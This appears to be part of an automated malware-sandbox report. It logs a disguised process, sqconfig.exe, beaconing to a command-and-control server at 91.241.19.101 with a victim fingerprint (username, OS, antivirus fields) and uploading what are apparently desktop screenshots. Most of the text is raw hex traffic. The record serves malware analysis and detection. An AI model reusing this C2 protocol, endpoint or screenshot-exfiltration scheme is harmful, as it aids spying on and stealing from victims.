                                                                  Sep 30, 2021 23:54:13.222017050 CEST21129OUTData Raw: 15 bf e2 75 ce a0 bf ee 0a c6 58 ce 2b 97 0a ff 00 75 11 e3 22 dd 66 43 8e 69 c0 73 de a6 11 7b 54 8b 03 1e 8a 6b 67 34 8c 15 29 3e 85 60 b4 e0 86 ae a5 94 ad d1 1b f2 ab 09 a5 5c 3f fc b3 6a cd d6 8a dd 9b 47 0f 37 d0 cc 09 52 04 f6 ad 75 d1 67
                                                                  Data Ascii: uX+u"fCis{Tkg4)>`\?jG7Rug WHUY2/Y<LVf(OjxLViSYK}*}LA-33RZu&/6=j&<W_Ua4T'__k){:~l7pL2c
                                                                  Sep 30, 2021 23:54:13.222347021 CEST21129OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 2d 2d 0d 0a
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0e--
                                                                  Sep 30, 2021 23:54:13.422708988 CEST21130INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  242192.168.2.35007891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:13.260094881 CEST21129OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:13.478153944 CEST21131INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  243192.168.2.35007991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:13.721601963 CEST21131OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:13.914041996 CEST21171INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  244192.168.2.35008091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:13.781774044 CEST21132OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:13.782021046 CEST21132OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:13.782291889 CEST21142OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:13.782434940 CEST21145OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:13.909476042 CEST21148OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:13.909557104 CEST21150OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:13.909696102 CEST21158OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:54:13.909792900 CEST21161OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:54:13.910109997 CEST21164OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:54:13.910288095 CEST21165OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:54:13.910386086 CEST21170OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:14.223203897 CEST21220INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  245192.168.2.35008191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:14.168976068 CEST21219OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:14.359792948 CEST21220INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:54:14.433888912 CEST21220OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:14.433996916 CEST21220OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:14.434242964 CEST21230OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:14.434458017 CEST21233OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:14.563954115 CEST21236OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:14.563987970 CEST21239OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:14.564060926 CEST21255OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:54:14.564095974 CEST21257OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:54:14.564125061 CEST21260OUTData Raw: 1b b9 5f ba 43 55 77 d1 2f 13 fe 59 67 e9 54 b1 34 de cc 87 82 ad 1d d1 98 bd 71 4f c5 59 6d 3e e1 3a c2 c3 f0 a6 18 64 1d 50 8f c2 ab da 45 ec c5 ec 66 b7 44 60 66 a4 14 6d 22 94 0c d1 72 94 5a 1d 4a 29 31 4e 02 a6 e5 0a 29 d4 80 52 81 52 cb 48
                                                                  Data Ascii: _CUw/YgT4qOYm>:dPEfD`fm"rZJ)1N)RRHP)S@Z|A?.kA?/O?:{?KIid<#a{xV@X9w* ^o""g_03L#1'$9$5utf-Y4QLQ`y |+,|Av
                                                                  Sep 30, 2021 23:54:14.692502022 CEST21266OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:54:14.692542076 CEST21271OUTData Raw: b2 8a d8 b8 60 6a b6 6a f8 e9 80 f0 be 8d fe e9 af 3a 8d bf 7a 9f ef 0a eb fc 75 e2 3d 2b 56 b4 b1 b5 d2 8b 98 ad c1 fb cb 8a e1 d6 52 92 23 76 07 26 b9 30 ed aa 56 6b 5d 4f 6e 70 f7 d7 5d 8f 72 f1 11 db 67 a6 7f d7 01 fc 85 73 e4 e6 96 7f 88 5e
                                                                  Data Ascii: `jj:zu=+VR#v&0Vk]Onp]rgs^Kk*17!-7N.JG8Xb8oxk7Qv7?+i:GwS]zI\3?(?jNP):);CsR3r
                                                                  Sep 30, 2021 23:54:14.865782022 CEST21308INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  246192.168.2.35008291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:14.624037027 CEST21261OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:14.836405039 CEST21308INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  247192.168.2.35008391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:15.081414938 CEST21309OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:15.291516066 CEST21323INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  248192.168.2.35008491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:15.190011024 CEST21309OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:15.190284967 CEST21310OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:15.190684080 CEST21320OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:15.191009998 CEST21322OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:15.315850973 CEST21336OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:15.316164017 CEST21348OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:54:15.440288067 CEST21351OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:15.440404892 CEST21367OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:54:15.440473080 CEST21369OUTData Raw: 45 14 50 03 85 29 a6 8e b4 e3 d2 a8 42 51 45 14 84 14 a2 92 96 98 01 a7 0e 94 dc d2 d3 10 ea 29 0d 14 08 5a 51 d6 90 53 a9 83 0a 51 4d cd 28 34 c4 28 a7 52 0a 5e f4 c4 03 ad 06 8a 29 88 05 38 53 7b d2 d3 01 d4 a2 9a 29 73 8a 64 8b 4d 27 9a 09 a4
                                                                  Data Ascii: EP)BQE)ZQSQM(4(R^)8S{)sdM'1j@Ttbh)ZQb)p5Dv-;(<1Rka1iE%(DNBQE!8JMEe;IIhc4iNv"y-?HalHRB-IDP*%
